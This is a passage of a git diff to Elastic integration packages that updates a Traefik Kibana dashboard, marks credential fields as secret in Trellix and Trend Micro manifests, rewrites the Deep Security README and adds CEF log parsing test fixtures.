"enhancements": {} + "7042a118-2f13-41fb-b0e6-192c1233689d": { + "columnOrder": [ + "bca2786a-0632-4fcb-bddf-6d0a9259844f", + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" + ], + "columns": { + "bca2786a-0632-4fcb-bddf-6d0a9259844f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Data sent", + "operationType": "sum", + "scale": "ratio", + "sourceField": "http.response.body.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset:traefik.access" + }, + "visualization": { + "fittingFunction": "Linear", + "layers": [ + { + "accessors": [ + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" + ], + "layerId": "7042a118-2f13-41fb-b0e6-192c1233689d", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "bca2786a-0632-4fcb-bddf-6d0a9259844f" + }, + { + "accessors": [ + "092db128-4fe0-463d-aee6-871ea4032f18" + ], + "layerId": "0b13f4d2-11cd-47b5-8128-7dcb60514861", + "layerType": "data", + "seriesType": "line", + "xAccessor": "df0a2fac-79a4-4354-a468-b9a6992e9335", + "yConfig": [ + { + "axisMode": "right", + "color": "#d6bf57", + "forAccessor": "092db128-4fe0-463d-aee6-871ea4032f18" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "legendSize": "auto" }, - "gridData": { - "h": 16, - "i": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", - "w": 16, - "x": 32, - "y": 39 + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", - "title": "Sent Byte Size [Logs Traefik]", - "type": "lens", - "version": "8.0.0" - } - ], - "timeRestore": false, - "title": "[Logs Traefik] Access logs", - "version": 1 - }, - "coreMigrationVersion": "8.0.0", - "id": "traefik-Logs-Traefik-Dashboard", - "migrationVersion": { - "dashboard": "8.0.0" - }, - "references": [ - { - "id": "traefik-71eaad00-e257-11ec-baf0-970634a1784d", - "name": "121accaa-e45e-414b-b9a3-f73fba06cf83:panel_121accaa-e45e-414b-b9a3-f73fba06cf83", - "type": "map" - }, - { - "id": "logs-*", - "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", - "type": "index-pattern" + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "type": "lens" }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", - "type": "index-pattern" - } + "title": "Sent Byte Size [Logs Traefik]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Logs Traefik] Access logs", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "121accaa-e45e-414b-b9a3-f73fba06cf83:layer_1_source_index_pattern", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json b/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json deleted file mode 100644 index a77df82af58..00000000000 --- a/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json +++ /dev/null @@ -1,211 +0,0 @@ -{ - "attributes": { - "description": "", - "layerListJSON": [ - { - "alpha": 1, - "id": "cccbea23-8692-421c-80e4-0f33e025c810", - "includeInFitToBounds": true, - "label": null, - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "isAutoSelect": true, - "lightModeDefault": "road_map_desaturated", - "type": "EMS_TMS" - }, - "style": { - "type": "TILE" - }, - "type": "VECTOR_TILE", - "visible": true - }, - { - "alpha": 0.75, - "id": "151240fd-cdc3-41d3-aaf8-21af553ecb69", - "includeInFitToBounds": true, - "joins": [], - "label": "Access Map [Logs Traefik]", - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "applyForceRefresh": true, - "applyGlobalQuery": true, - "applyGlobalTime": true, - "geoField": "source.geo.location", - "id": "a8ada758-9bca-4cde-93b2-a62db261663d", - "indexPatternRefName": "layer_1_source_index_pattern", - "metrics": [ - { - "type": "count" - } - ], - "requestType": "point", - "resolution": "MOST_FINE", - "type": "ES_GEO_GRID" - }, - "style": { - "isTimeAware": true, - "properties": { - "fillColor": { - "options": { - "color": "Yellow to Red", - "colorCategory": "palette_0", - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "type": "ORDINAL" - }, - "type": "DYNAMIC" - }, - "icon": { - "options": { - "value": "marker" - }, - "type": "STATIC" - }, - "iconOrientation": { - "options": { - "orientation": 0 - }, - "type": "STATIC" - }, - "iconSize": { - "options": { - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "maxSize": 18, - "minSize": 7 - }, - "type": "DYNAMIC" - }, - "labelBorderColor": { - "options": { - "color": "#FFFFFF" - }, - "type": "STATIC" - }, - "labelBorderSize": { - "options": { - "size": "SMALL" - } - }, - "labelColor": { - "options": { - "color": "#000000" - }, - "type": "STATIC" - }, - "labelSize": { - "options": { - "size": 14 - }, - "type": "STATIC" - }, - "labelText": { - "options": { - "value": "" - }, - "type": "STATIC" - }, - "lineColor": { - "options": { - "color": "#3d3d3d" - }, - "type": "STATIC" - }, - "lineWidth": { - "options": { - "size": 1 - }, - "type": "STATIC" - }, - "symbolizeAs": { - "options": { - "value": "circle" - } - } - }, - "type": "VECTOR" - }, - "type": "VECTOR", - "visible": true - } - ], - "mapStateJSON": { - "center": { - "lat": 19.94277, - "lon": 0 - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "refreshConfig": { - "interval": 0, - "isPaused": true - }, - "settings": { - "autoFitToDataBounds": false, - "backgroundColor": "#ffffff", - "browserLocation": { - "zoom": 2 - }, - "disableInteractive": false, - "disableTooltipControl": false, - "fixedLocation": { - "lat": 0, - "lon": 0, - "zoom": 2 - }, - "hideLayerControl": false, - "hideToolbarOverlay": false, - "hideViewControl": false, - "initialLocation": "LAST_SAVED_LOCATION", - "maxZoom": 24, - "minZoom": 0, - "showScaleControl": false, - "showSpatialFilters": true, - "showTimesliderToggleButton": true, - "spatialFiltersAlpa": 0.3, - "spatialFiltersFillColor": "#DA8B45", - "spatialFiltersLineColor": "#DA8B45" - }, - "timeFilters": { - "from": "now-15m", - "to": "now" - }, - "zoom": 2.11 - }, - "title": "Traefik logs [Logs Traefik]", - "uiStateJSON": { - "isLayerTOCOpen": true, - "openTOCDetails": [] - } - }, - "coreMigrationVersion": "8.0.0", - "id": "traefik-71eaad00-e257-11ec-baf0-970634a1784d", - "migrationVersion": { - "map": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "layer_1_source_index_pattern", - "type": "index-pattern" - } - ], - "type": "map" -} \ No newline at end of file diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml index 84d48bec909..6403b941cee 100644 --- a/packages/traefik/manifest.yml +++ b/packages/traefik/manifest.yml @@ -1,6 +1,6 @@ name: traefik title: Traefik -version: "1.11.0" +version: "1.11.1" description: Collect logs and metrics from Traefik servers with Elastic Agent. type: integration icons: diff --git a/packages/trellix_edr_cloud/changelog.yml b/packages/trellix_edr_cloud/changelog.yml index cea2218380a..b883c99f3ba 100644 --- a/packages/trellix_edr_cloud/changelog.yml +++ b/packages/trellix_edr_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/trellix_edr_cloud/manifest.yml b/packages/trellix_edr_cloud/manifest.yml index c5606219650..181b095988d 100644 --- a/packages/trellix_edr_cloud/manifest.yml +++ b/packages/trellix_edr_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: trellix_edr_cloud title: Trellix EDR Cloud -version: "1.0.1" +version: "1.1.0" description: Collect logs from Trellix EDR Cloud with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -60,6 +60,7 @@ policy_templates: required: false show_user: true description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -67,6 +68,7 @@ policy_templates: required: false show_user: true description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file. + secret: true - name: region type: text title: "[SQS] Region" @@ -75,12 +77,13 @@ policy_templates: show_user: true description: The name of the AWS region of the end point. If this option is given it takes precedence over the region name obtained from the queue_url value. - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/trellix_epo_cloud/changelog.yml b/packages/trellix_epo_cloud/changelog.yml index 4ed1151140e..c5ab2775d1c 100644 --- a/packages/trellix_epo_cloud/changelog.yml +++ b/packages/trellix_epo_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.10.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.9.1" changes: - description: Changed owners diff --git a/packages/trellix_epo_cloud/manifest.yml b/packages/trellix_epo_cloud/manifest.yml index 73133e0cc37..0124cb44a98 100644 --- a/packages/trellix_epo_cloud/manifest.yml +++ b/packages/trellix_epo_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: trellix_epo_cloud title: Trellix ePO Cloud -version: "1.9.1" +version: "1.10.0" source: license: Elastic-2.0 description: Collect logs from Trellix ePO Cloud with Elastic Agent. @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -54,6 +54,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: api_key type: password title: API Key @@ -61,6 +62,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL @@ -75,6 +77,7 @@ policy_templates: default: https://iam.mcafee-cloud.com/iam/v1.1/token required: true show_user: false + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/trend_micro_vision_one/changelog.yml b/packages/trend_micro_vision_one/changelog.yml index ddc31b379fa..c0fa8edb2fb 100644 --- a/packages/trend_micro_vision_one/changelog.yml +++ b/packages/trend_micro_vision_one/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.15.1" changes: - description: Changed owners diff --git a/packages/trend_micro_vision_one/manifest.yml b/packages/trend_micro_vision_one/manifest.yml index 1047355cbad..29cb5f07f9b 100644 --- a/packages/trend_micro_vision_one/manifest.yml +++ b/packages/trend_micro_vision_one/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: trend_micro_vision_one title: Trend Micro Vision One -version: "1.15.1" +version: "1.16.0" description: Collect logs from Trend Micro Vision One with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/trend-micro-vision-one-alert-dashboard-screenshot.png title: Trend Micro Vision One Dashboard Screenshot @@ -46,6 +46,7 @@ policy_templates: title: API Token description: API Token with API Access Level type. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/trendmicro/_dev/build/build.yml b/packages/trendmicro/_dev/build/build.yml index 2bfcfc223b0..71f48ba2a9c 100644 --- a/packages/trendmicro/_dev/build/build.yml +++ b/packages/trendmicro/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/trendmicro/_dev/build/docs/README.md b/packages/trendmicro/_dev/build/docs/README.md index ca546c7d55a..931a4c77468 100644 --- a/packages/trendmicro/_dev/build/docs/README.md +++ b/packages/trendmicro/_dev/build/docs/README.md @@ -2,15 +2,50 @@ ## Overview -Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via a log file. +Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via syslog server. ## Data Streams -This integration collects **deep_security** data streams.See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/aws/events.html). +This integration supports **deep_security** data stream. See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/20_0/on-premise/events.html). ## Requirements -Elastic Agent is required to ingest data from Deep Security log files. This integration has been tested against Deep Security v12 LTS. Please note is you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). +Elastic Agent is required to ingest data from Deep Security. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +## Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. + +This integration has been tested against Deep Security 20. Please note if you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). + +## Setup + +Follow the [setup guide](https://help.deepsecurity.trendmicro.com/20_0/on-premise/event-syslog.html) to forward deep security events to a syslog server. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Trend Micro. +3. Click on the "Trend Micro" integration from the search results. +4. Click on the "Add Trend Micro" button to add the integration. +5. Add all the required integration configuration parameters according to the enabled input type. +6. Click on "Save and Continue" to save the integration. ## Logs @@ -18,4 +53,6 @@ Elastic Agent is required to ingest data from Deep Security log files. This inte Deep Security logs collect the trendmicro deep security logs. +{{event "deep_security"}} + {{fields "deep_security"}} diff --git a/packages/trendmicro/changelog.yml b/packages/trendmicro/changelog.yml index fe2787f3e56..5dad01043b1 100644 --- a/packages/trendmicro/changelog.yml +++ b/packages/trendmicro/changelog.yml @@ -1,4 +1,22 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Add ECS categorizations for anti-malware events. + type: enhancement + link: https://github.com/elastic/integrations/pull/9407 +- version: "2.1.0" + changes: + - description: Use CEF name as `event.action` if no action is specified. + type: enhancement + link: https://github.com/elastic/integrations/pull/9292 +- version: "2.0.0" + changes: + - description: Breaking changes for improved ECS mappings, new dashboards and compatibility with Deep Security v20. + type: enhancement + link: https://github.com/elastic/integrations/pull/9124 + - description: Update the minimum kibana version to 8.11.0. + type: enhancement + link: https://github.com/elastic/integrations/pull/9124 - version: "1.8.4" changes: - description: Changed owners diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml index 4da22641654..be41bb0d476 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml @@ -1,3 +1,4 @@ fields: tags: - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json index bc5bd20ae85..b879727d579 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json @@ -115,6 +115,142 @@ "name": "System" } } + }, + { + "@timestamp": "2024-01-22T10:19:47.482Z", + "event": { + "code": "1001251", + "severity": 6, + "action": "Reset", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA" + }, + "source": { + "port": 53, + "mac": "00-BB-00-00-BB-00", + "ip": "216.160.83.56", + "bytes": 150 + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "cef": { + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": "6", + "extensions": { + "deviceCustomString6": "8", + "sourceMacAddress": "00-BB-00-00-BB-00", + "deviceCustomString1Label": "DPI Note", + "destinationPort": 65535, + "deviceCustomString5Label": "DPI Stream Position", + "deviceCustomNumber3": 16, + "transportProtocol": "UDP", + "sourcePort": 53, + "deviceCustomNumber1": 4, + "TrendMicroDsFrameType": "IP", + "destinationMacAddress": "11-AA-00-00-AA-00", + "TrendMicroDsTenant": "814726098539", + "TrendMicroDsPacketData": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "deviceAction": "Reset", + "destinationAddress": "81.2.69.144", + "deviceCustomString1": "CVE-2007-5355", + "sourceAddress": "216.160.83.56", + "deviceCustomString6Label": "DPI Flags", + "deviceHostName": "2K19-va.test.local", + "deviceCustomString5": "16", + "deviceCustomNumber1Label": "Host ID", + "deviceCustomNumber3Label": "DPI Packet Position", + "baseEventCount": 1, + "bytesIn": 150, + "TrendMicroDsTenantId": "16005" + }, + "version": "0", + "device": { + "vendor": "Trend Micro", + "product": "Deep Security Agent", + "version": "20.0.1.690", + "event_class_id": "1001251" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "product": "Deep Security Agent", + "version": "20.0.1.690", + "hostname": "2K19-va.test.local", + "vendor": "Trend Micro" + }, + "destination": { + "ip": "81.2.69.144", + "port": 65535, + "mac": "11-AA-00-00-AA-00" + } + }, + { + "@timestamp": "2024-01-22T10:19:47.482Z", + "event": { + "code": "4000000", + "severity": 6, + "action": "Reset", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA" + }, + "source": { + "port": 53, + "mac": "00-BB-00-00-BB-00", + "ip": "216.160.83.56", + "bytes": 150 + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "cef": { + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": "6", + "extensions": { + "deviceCustomString6": "8", + "sourceMacAddress": "00-BB-00-00-BB-00", + "deviceCustomString1Label": "DPI Note", + "destinationPort": 65535, + "deviceCustomString5Label": "DPI Stream Position", + "deviceCustomNumber3": 16, + "transportProtocol": "UDP", + "sourcePort": 53, + "deviceCustomNumber1": 4, + "TrendMicroDsFrameType": "IP", + "destinationMacAddress": "11-AA-00-00-AA-00", + "TrendMicroDsTenant": "814726098539", + "TrendMicroDsPacketData": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "deviceAction": "Reset", + "destinationAddress": "81.2.69.144", + "deviceCustomString1": "CVE-2007-5355", + "sourceAddress": "216.160.83.56", + "deviceCustomString6Label": "DPI Flags", + "deviceHostName": "2K19-va.test.local", + "deviceCustomString5": "16", + "deviceCustomNumber1Label": "Host ID", + "deviceCustomNumber3Label": "DPI Packet Position", + "baseEventCount": 1, + "bytesIn": 150, + "TrendMicroDsTenantId": "16005" + }, + "version": "0", + "device": { + "vendor": "Trend Micro", + "product": "Deep Security Agent", + "version": "20.0.1.690", + "event_class_id": "4000001" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "product": "Deep Security Agent", + "version": "20.0.1.690", + "hostname": "2K19-va.test.local", + "vendor": "Trend Micro" + }, + "destination": { + "ip": "81.2.69.144", + "port": 65535, + "mac": "11-AA-00-00-AA-00" + } } ] } \ No newline at end of file diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json index 9340e5d3121..ac8cbd19a75 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json @@ -6,27 +6,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "integrity-monitoring-rule-updated", "code": "482", + "kind": "event", "original": "<190>2021-10-06T01:29:43-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|482|Integrity Monitoring Rule Updated|3|src=192.168.1.20 suser=System target=1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001) msg=Description Omitted TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 3, - "type": [ - "info" - ] + "severity": 3 }, "log": { "syslog": { "priority": 190 } }, + "message": "Description Omitted", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": [ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { @@ -34,17 +38,34 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "482", "message": "Description Omitted", "name": "Integrity Monitoring Rule Updated", + "severity": 3, "signature_id": 482, - "target": "1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001)", - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "target": { + "value": "1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001)" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" } } }, @@ -54,27 +75,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "alert-started", "code": "190", + "kind": "event", "original": "<190>2021-10-06T01:34:40-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|190|Alert Started|3|src=192.168.1.20 suser=System msg=Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 3, - "type": [ - "info" - ] + "severity": 3 }, "log": { "syslog": { "priority": 190 } }, + "message": "Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": 